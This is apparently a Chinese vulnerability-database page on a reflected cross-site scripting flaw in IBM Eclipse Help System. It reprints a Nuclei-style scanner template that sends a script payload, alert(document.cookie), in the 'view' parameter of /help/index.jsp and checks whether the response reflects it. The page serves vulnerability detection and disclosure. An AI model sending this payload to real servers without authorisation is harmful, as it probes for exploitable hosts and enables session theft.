eclipse-help-system-xss: IBM Eclipse Help System - Cross-Site Scripting

日期: 2025-08-01 | 影响软件: IBM Eclipse Help System | POC: 已公开

漏洞描述

IBM Eclipse Help System 6.1.0 through 6.1.0.6, 6.1.5 through 6.1.5.3, 7.0 through 7.0.0.2, and 8.0 prior to 8.0.0.1 contains a cross-site scripting vulnerability. An attacker can execute arbitrary script in the browser of an unsuspecting user in the context of the affected site.

PoC代码[已公开]

id: eclipse-help-system-xss

info:
  name: IBM Eclipse Help System - Cross-Site Scripting
  author: pikpikcu
  severity: high
  description: IBM Eclipse Help System 6.1.0 through 6.1.0.6, 6.1.5 through 6.1.5.3, 7.0 through 7.0.0.2, and 8.0 prior to 8.0.0.1 contains a cross-site scripting vulnerability. An attacker can execute arbitrary script in the browser of an unsuspecting user in the context of the affected site.
  reference:
    - https://packetstormsecurity.com/files/131924/IBM-Eclipse-Help-System-IEHS-Cross-Site-Scripting.html
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
    cvss-score: 7.2
    cwe-id: CWE-79
  metadata:
    max-request: 1
  tags: ibm,xss,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/help/index.jsp?view=%3Cscript%3Ealert(document.cookie)%3C/script%3E"

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        words:
          - "<script>alert(document.cookie)</script>"
          - "file not found"
        condition: and
        part: body

      - type: word
        words:
          - "text/html"
        part: header
# digest: 4b0a00483046022100d91922d706c4b449b541b85623ff177fe73e4be3595b4282916db0b509f8e89d022100e478857fcf360d818c5e38f417301440e702bf7224aa5308abb932fa112cbbec:922c64590222798bb761d5b6d8e72950

相关漏洞推荐